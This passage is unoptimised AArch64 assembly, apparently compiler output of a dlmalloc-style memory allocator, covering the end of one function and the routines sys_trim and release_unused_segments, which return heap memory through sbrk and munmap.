b LBB4_205
LBB4_200:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #136]
ldr x8, [x8, #16]
str x8, [sp, #112]
ldr x8, [sp, #136]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB4_202
b LBB4_201
LBB4_201:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #112]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB4_202
LBB4_202:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB4_204
b LBB4_203
LBB4_203:
ldr x8, [sp, #184]
ldr x9, [sp, #112]
str x8, [x9, #24]
ldr x9, [sp, #136]
str x8, [x9, #16]
ldr x8, [sp, #112]
ldr x9, [sp, #184]
str x8, [x9, #16]
ldr x8, [sp, #136]
ldr x9, [sp, #184]
str x8, [x9, #24]
ldr x8, [sp, #184]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB4_206
LBB4_204:
bl _abort
LBB4_205: ; in Loop: Header=BB4_193 Depth=1
b LBB4_193
LBB4_206:
b LBB4_207
LBB4_207:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [x9, #56]
subs x8, x8, #1
str x8, [x9, #56]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_209
b LBB4_208
LBB4_208:
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _release_unused_segments
b LBB4_209
LBB4_209:
b LBB4_210
LBB4_210:
b LBB4_214
LBB4_211:
b LBB4_212
LBB4_212:
b LBB4_213
LBB4_213:
bl _abort
LBB4_214:
b LBB4_215
LBB4_215:
add sp, sp, #480
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function sys_trim
_sys_trim: ; @sys_trim
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _mparams@PAGE
adrp x9, _mparams@PAGE
add x9, x9, _mparams@PAGEOFF
str x9, [sp, #8] ; 8-byte Folded Spill
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur xzr, [x29, #-24]
ldr x8, [x8, _mparams@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB5_2
b LBB5_1
LBB5_1:
bl _init_mparams
b LBB5_2
LBB5_2:
ldur x8, [x29, #-16]
adds x8, x8, #128
cset w8, hs
tbnz w8, #0, LBB5_29
b LBB5_3
LBB5_3:
ldur x8, [x29, #-8]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB5_29
b LBB5_4
LBB5_4:
ldur x8, [x29, #-16]
add x8, x8, #80
stur x8, [x29, #-16]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-16]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB5_25
b LBB5_5
LBB5_5:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x8, [x8, #16]
stur x8, [x29, #-32]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-16]
subs x8, x8, x9
ldur x9, [x29, #-32]
subs x9, x9, #1
add x8, x8, x9
ldur x9, [x29, #-32]
udiv x8, x8, x9
subs x8, x8, #1
ldur x9, [x29, #-32]
mul x8, x8, x9
stur x8, [x29, #-40]
ldur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldr x1, [x8, #40]
bl _segment_holding
str x0, [sp, #48]
ldr x8, [sp, #48]
ldr w8, [x8, #24]
ands w8, w8, #0x8
cset w8, ne
tbnz w8, #0, LBB5_22
b LBB5_6
LBB5_6:
ldr x8, [sp, #48]
ldr w8, [x8, #24]
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB5_13
b LBB5_7
LBB5_7:
ldr x8, [sp, #48]
ldr x8, [x8, #8]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB5_12
b LBB5_8
LBB5_8:
ldur x0, [x29, #-8]
ldr x1, [sp, #48]
bl _has_segment_link
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB5_12
b LBB5_9
LBB5_9:
ldr x8, [sp, #48]
ldr x8, [x8, #8]
ldur x9, [x29, #-40]
subs x8, x8, x9
str x8, [sp, #40]
ldr x8, [sp, #48]
ldr x8, [x8]
ldr x9, [sp, #40]
add x0, x8, x9
ldur x1, [x29, #-40]
bl _munmap
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB5_11
b LBB5_10
LBB5_10:
ldur x8, [x29, #-40]
stur x8, [x29, #-24]
b LBB5_11
LBB5_11:
b LBB5_12
LBB5_12:
b LBB5_21
LBB5_13:
ldur x8, [x29, #-40]
mov x9, #9223372036854775807
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB5_15
b LBB5_14
LBB5_14:
ldur x9, [x29, #-32]
mov x8, #-9223372036854775808
subs x8, x8, x9
stur x8, [x29, #-40]
b LBB5_15
LBB5_15:
mov w0, #0
bl _sbrk
str x0, [sp, #32]
ldr x8, [sp, #32]
ldr x9, [sp, #48]
ldr x9, [x9]
ldr x10, [sp, #48]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB5_20
b LBB5_16
LBB5_16:
ldur x9, [x29, #-40]
mov x8, #0
subs x8, x8, x9
mov x0, x8
bl _sbrk
str x0, [sp, #24]
mov w0, #0
bl _sbrk
str x0, [sp, #16]
ldr x8, [sp, #24]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB5_19
b LBB5_17
LBB5_17:
ldr x8, [sp, #16]
ldr x9, [sp, #32]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB5_19
b LBB5_18
LBB5_18:
ldr x8, [sp, #32]
ldr x9, [sp, #16]
subs x8, x8, x9
stur x8, [x29, #-24]
b LBB5_19
LBB5_19:
b LBB5_20
LBB5_20:
b LBB5_21
LBB5_21:
b LBB5_22
LBB5_22:
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB5_24
b LBB5_23
LBB5_23:
ldur x10, [x29, #-24]
ldr x9, [sp, #48]
ldr x8, [x9, #8]
subs x8, x8, x10
str x8, [x9, #8]
ldur x10, [x29, #-24]
ldur x9, [x29, #-8]
ldr x8, [x9, #856]
subs x8, x8, x10
str x8, [x9, #856]
ldur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldr x1, [x8, #40]
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-24]
subs x2, x8, x9
bl _init_top
b LBB5_24
LBB5_24:
b LBB5_25
LBB5_25:
ldur x0, [x29, #-8]
bl _release_unused_segments
ldur x8, [x29, #-24]
add x8, x8, x0
stur x8, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB5_28
b LBB5_26
LBB5_26:
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-8]
ldr x9, [x9, #48]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB5_28
b LBB5_27
LBB5_27:
ldur x9, [x29, #-8]
mov x8, #-1
str x8, [x9, #48]
b LBB5_28
LBB5_28:
b LBB5_29
LBB5_29:
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
and w9, w8, #0x1
mov w8, #0
ands w9, w9, #0x1
csinc w0, w8, wzr, eq
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function release_unused_segments
_release_unused_segments: ; @release_unused_segments
.cfi_startproc
; %bb.0:
sub sp, sp, #320
.cfi_def_cfa_offset 320
stp x28, x27, [sp, #288] ; 16-byte Folded Spill
stp x29, x30, [sp, #304] ; 16-byte Folded Spill
add x29, sp, #304
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-24]
stur xzr, [x29, #-32]
stur wzr, [x29, #-36]
ldur x8, [x29, #-24]
add x8, x8, #888
stur x8, [x29, #-48]
ldur x8, [x29, #-48]
ldr x8, [x8, #16]
stur x8, [x29, #-56]
b LBB6_1
LBB6_1: ; =>This Loop Header: Depth=1
; Child Loop BB6_22 Depth 2
; Child Loop BB6_74 Depth 2
ldur x8, [x29, #-56]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_92
b LBB6_2
LBB6_2: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-56]
ldr x8, [x8]
stur x8, [x29, #-64]
ldur x8, [x29, #-56]
ldr x8, [x8, #8]
stur x8, [x29, #-72]
ldur x8, [x29, #-56]
ldr x8, [x8, #16]
stur x8, [x29, #-80]
ldur w8, [x29, #-36]
add w8, w8, #1
stur w8, [x29, #-36]
ldur x8, [x29, #-56]
ldr w8, [x8, #24]
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_91
b LBB6_3
LBB6_3: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-56]
ldr w8, [x8, #24]
ands w8, w8, #0x8
cset w8, ne
tbnz w8, #0, LBB6_91
b LBB6_4
LBB6_4: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-64]
str x8, [sp, #56] ; 8-byte Folded Spill
ldur x8, [x29, #-64]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB6_6
b LBB6_5
LBB6_5: ; in Loop: Header=BB6_1 Depth=1
mov x8, #0
str x8, [sp, #48] ; 8-byte Folded Spill
b LBB6_7
LBB6_6: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-64]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #48] ; 8-byte Folded Spill
b LBB6_7
LBB6_7: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #56] ; 8-byte Folded Reload
ldr x9, [sp, #48] ; 8-byte Folded Reload
add x8, x8, x9
stur x8, [x29, #-88]
ldur x8, [x29, #-88]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-96]
ldur x8, [x29, #-88]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB6_90
b LBB6_8
LBB6_8: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-88]
ldur x9, [x29, #-96]
add x8, x8, x9
ldur x9, [x29, #-64]
ldur x10, [x29, #-72]
add x9, x9, x10
subs x9, x9, #80
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB6_90
b LBB6_9
LBB6_9: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-88]
stur x8, [x29, #-104]
ldur x8, [x29, #-88]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB6_11
b LBB6_10
LBB6_10: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-24]
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
ldur x8, [x29, #-24]
str xzr, [x8, #8]
b LBB6_60
LBB6_11: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr x8, [x8, #48]
stur x8, [x29, #-112]
ldur x8, [x29, #-104]
ldr x8, [x8, #24]
ldur x9, [x29, #-104]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB6_19
b LBB6_12
LBB6_12: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr x8, [x8, #16]
stur x8, [x29, #-128]
ldur x8, [x29, #-104]
ldr x8, [x8, #24]
stur x8, [x29, #-120]
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB6_15
b LBB6_13
LBB6_13: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-128]
ldr x8, [x8, #24]
ldur x9, [x29, #-104]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB6_15
b LBB6_14
LBB6_14: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldr x8, [x8, #16]
ldur x9, [x29, #-104]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB6_15
LBB6_15: ; in Loop: Header=BB6_1 Depth=1
ldr w8, [sp, #44] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_17
b LBB6_16
LBB6_16: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldur x9, [x29, #-128]
str x8, [x9, #24]
ldur x8, [x29, #-128]
ldur x9, [x29, #-120]
str x8, [x9, #16]
b LBB6_18
LBB6_17:
bl _abort
LBB6_18: ; in Loop: Header=BB6_1 Depth=1
b LBB6_31
LBB6_19: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
add x9, x8, #40
stur x9, [x29, #-136]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-120]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_21
b LBB6_20
LBB6_20: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
add x9, x8, #32
stur x9, [x29, #-136]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-120]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_30
b LBB6_21
LBB6_21: ; in Loop: Header=BB6_1 Depth=1
b LBB6_22
LBB6_22: ; Parent Loop BB6_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur x8, [x29, #-120]
add x9, x8, #40
stur x9, [x29, #-144]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #40] ; 4-byte Folded Spill
tbnz w8, #0, LBB6_24
b LBB6_23
LBB6_23: ; in Loop: Header=BB6_22 Depth=2
ldur x8, [x29, #-120]
add x9, x8, #32
stur x9, [x29, #-144]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB6_24
LBB6_24: ; in Loop: Header=BB6_22 Depth=2
ldr w8, [sp, #40] ; 4-byte Folded Reload
tbz w8, #0, LBB6_26
b LBB6_25
LBB6_25: ; in Loop: Header=BB6_22 Depth=2
ldur x8, [x29, #-144]
mov x9, x8
stur x9, [x29, #-136]
ldr x8, [x8]
stur x8, [x29, #-120]
b LBB6_22
LBB6_26: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-136]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_28
b LBB6_27
LBB6_27: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-136]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB6_29
LBB6_28:
bl _abort
LBB6_29: ; in Loop: Header=BB6_1 Depth=1
b LBB6_30
LBB6_30: ; in Loop: Header=BB6_1 Depth=1
b LBB6_31
LBB6_31: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_59
b LBB6_32
LBB6_32: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-24]
add x8, x8, #600
ldur x9, [x29, #-104]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #152]
ldur x8, [x29, #-104]
ldr x9, [sp, #152]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB6_36
b LBB6_33
LBB6_33: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldr x10, [sp, #152]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_35
b LBB6_34
LBB6_34: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB6_35
LBB6_35: ; in Loop: Header=BB6_1 Depth=1
b LBB6_43
LBB6_36: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-112]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_41
b LBB6_37
LBB6_37: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-112]
ldr x8, [x8, #32]
ldur x9, [x29, #-104]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB6_39
b LBB6_38
LBB6_38: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldur x9, [x29, #-112]
str x8, [x9, #32]
b LBB6_40
LBB6_39: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldur x9, [x29, #-112]
str x8, [x9, #40]
b LBB6_40
LBB6_40: ; in Loop: Header=BB6_1 Depth=1
b LBB6_42
LBB6_41:
bl _abort
LBB6_42: ; in Loop: Header=BB6_1 Depth=1
b LBB6_43
LBB6_43: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_58
b LBB6_44
LBB6_44: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-120]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_56
b LBB6_45
LBB6_45: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-112]
ldur x9, [x29, #-120]
str x8, [x9, #48]
ldur x8, [x29, #-104]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #144]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_50
b LBB6_46
LBB6_46: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #144]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_48
b LBB6_47
LBB6_47: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #144]
ldur x9, [x29, #-120]
str x8, [x9, #32]
ldur x8, [x29, #-120]
ldr x9, [sp, #144]
str x8, [x9, #48]
b LBB6_49
LBB6_48:
bl _abort
LBB6_49: ; in Loop: Header=BB6_1 Depth=1
b LBB6_50
LBB6_50: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #136]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_55
b LBB6_51
LBB6_51: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #136]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_53
b LBB6_52
LBB6_52: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #136]
ldur x9, [x29, #-120]
str x8, [x9, #40]
ldur x8, [x29, #-120]
ldr x9, [sp, #136]
str x8, [x9, #48]
b LBB6_54
LBB6_53:
bl _abort
LBB6_54: ; in Loop: Header=BB6_1 Depth=1
b LBB6_55
LBB6_55: ; in Loop: Header=BB6_1 Depth=1
b LBB6_57
LBB6_56:
bl _abort
LBB6_57: ; in Loop: Header=BB6_1 Depth=1
b LBB6_58
LBB6_58: ; in Loop: Header=BB6_1 Depth=1
b LBB6_59
LBB6_59: ; in Loop: Header=BB6_1 Depth=1
b LBB6_60
LBB6_60: ; in Loop: Header=BB6_1 Depth=1
ldur x0, [x29, #-64]
ldur x1, [x29, #-72]
bl _munmap
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB6_62
b LBB6_61
LBB6_61: ; in Loop: Header=BB6_1 Depth=1
ldur x9, [x29, #-72]
ldur x8, [x29, #-32]
add x8, x8, x9
stur x8, [x29, #-32]
ldur x10, [x29, #-72]
ldur x9, [x29, #-24]
ldr x8, [x9, #856]
subs x8, x8, x10
str x8, [x9, #856]
ldur x8, [x29, #-48]
stur x8, [x29, #-56]
ldur x8, [x29, #-80]
ldur x9, [x29, #-56]
str x8, [x9, #16]
b LBB6_89
LBB6_62: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-96]
lsr x8, x8, #8
str x8, [sp, #112]
ldr x8, [sp, #112]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_64
b LBB6_63
LBB6_63: ; in Loop: Header=BB6_1 Depth=1
str wzr, [sp, #124]
b LBB6_68
LBB6_64: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #112]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB6_66
b LBB6_65
LBB6_65: ; in Loop: Header=BB6_1 Depth=1
mov w8, #31
str w8, [sp, #124]
b LBB6_67
LBB6_66: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #112]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #108]
ldr w8, [sp, #108]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #104]
ldr w9, [sp, #104]
ldr w8, [sp, #108]
lsl w8, w8, w9
str w8, [sp, #108]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #100]
ldr w9, [sp, #100]
ldr w8, [sp, #104]
add w8, w8, w9
str w8, [sp, #104]
ldr w9, [sp, #100]
ldr w8, [sp, #108]
lsl w8, w8, w9
str w8, [sp, #108]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #100]
ldr w8, [sp, #104]
add w8, w8, w9
str w8, [sp, #104]
ldr w9, [sp, #104]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #100]
ldr w9, [sp, #108]
lsl w9, w9, w10
str w9, [sp, #108]
add w8, w8, w9, lsr #15
str w8, [sp, #100]
ldr w8, [sp, #100]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-96]
ldr w10, [sp, #100]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #124]
b LBB6_67
LBB6_67: ; in Loop: Header=BB6_1 Depth=1
b LBB6_68
LBB6_68: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-24]
add x8, x8, #600
ldr w9, [sp, #124]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #128]
ldr w8, [sp, #124]
ldur x9, [x29, #-104]
str w8, [x9, #56]
ldur x8, [x29, #-104]
; kill: def $x9 killed $xzr
str xzr, [x8, #40]
ldur x8, [x29, #-104]
str xzr, [x8, #32]
ldur x8, [x29, #-24]
ldr w8, [x8, #4]
ldr w10, [sp, #124]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB6_70
b LBB6_69
LBB6_69: ; in Loop: Header=BB6_1 Depth=1
ldr w9, [sp, #124]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldur x8, [x29, #-104]
ldr x9, [sp, #128]
str x8, [x9]
ldr x8, [sp, #128]
ldur x9, [x29, #-104]
str x8, [x9, #48]
ldur x8, [x29, #-104]
ldur x9, [x29, #-104]
str x8, [x9, #24]
ldur x9, [x29, #-104]
str x8, [x9, #16]
b LBB6_88
LBB6_70: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #128]
ldr x8, [x8]
str x8, [sp, #88]
ldur x8, [x29, #-96]
str x8, [sp, #32] ; 8-byte Folded Spill
ldr w8, [sp, #124]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB6_72
b LBB6_71
LBB6_71: ; in Loop: Header=BB6_1 Depth=1
mov x8, #0
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB6_73
LBB6_72: ; in Loop: Header=BB6_1 Depth=1
ldr w8, [sp, #124]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #24] ; 8-byte Folded Spill
b LBB6_73
LBB6_73: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x9, [sp, #24] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #80]
b LBB6_74
LBB6_74: ; Parent Loop BB6_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #88]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB6_81
b LBB6_75
LBB6_75: ; in Loop: Header=BB6_74 Depth=2
ldr x8, [sp, #88]
add x8, x8, #32
ldr x9, [sp, #80]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #72]
ldr x8, [sp, #80]
lsl x8, x8, #1
str x8, [sp, #80]
ldr x8, [sp, #72]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_77
b LBB6_76
LBB6_76: ; in Loop: Header=BB6_74 Depth=2
ldr x8, [sp, #72]
ldr x8, [x8]
str x8, [sp, #88]
b LBB6_80
LBB6_77: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #72]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_79
b LBB6_78
LBB6_78: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr x9, [sp, #72]
str x8, [x9]
ldr x8, [sp, #88]
ldur x9, [x29, #-104]
str x8, [x9, #48]
ldur x8, [x29, #-104]
ldur x9, [x29, #-104]
str x8, [x9, #24]
ldur x9, [x29, #-104]
str x8, [x9, #16]
b LBB6_87
LBB6_79:
bl _abort
LBB6_80: ; in Loop: Header=BB6_74 Depth=2
b LBB6_86
LBB6_81: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #88]
ldr x8, [x8, #16]
str x8, [sp, #64]
ldr x8, [sp, #88]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB6_83
b LBB6_82
LBB6_82: ; in Loop: Header=BB6_1 Depth=1
ldr x8, [sp, #64]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB6_83
LBB6_83: ; in Loop: Header=BB6_1 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB6_85
b LBB6_84
LBB6_84: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-104]
ldr x9, [sp, #64]
str x8, [x9, #24]
ldr x9, [sp, #88]
str x8, [x9, #16]
ldr x8, [sp, #64]
ldur x9, [x29, #-104]
str x8, [x9, #16]
ldr x8, [sp, #88]
ldur x9, [x29, #-104]
str x8, [x9, #24]
ldur x8, [x29, #-104]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB6_87
LBB6_85:
bl _abort
LBB6_86: ; in Loop: Header=BB6_74 Depth=2
b LBB6_74
LBB6_87: ; in Loop: Header=BB6_1 Depth=1
b LBB6_88
LBB6_88: ; in Loop: Header=BB6_1 Depth=1
b LBB6_89
LBB6_89: ; in Loop: Header=BB6_1 Depth=1
b LBB6_90
LBB6_90: ; in Loop: Header=BB6_1 Depth=1
b LBB6_91
LBB6_91: ; in Loop: Header=BB6_1 Depth=1
ldur x8, [x29, #-56]
stur x8, [x29, #-48]
ldur x8, [x29, #-80]
stur x8, [x29, #-56]
b LBB6_1
LBB6_92:
ldursw x8, [x29, #-36]
subs x8, x8, #4095
cset w8, ls
tbnz w8, #0, LBB6_94
b LBB6_93
LBB6_93:
ldursw x8, [x29, #-36]
str x8, [sp, #8] ; 8-byte Folded Spill
b LBB6_95
LBB6_94:
mov x8, #4095
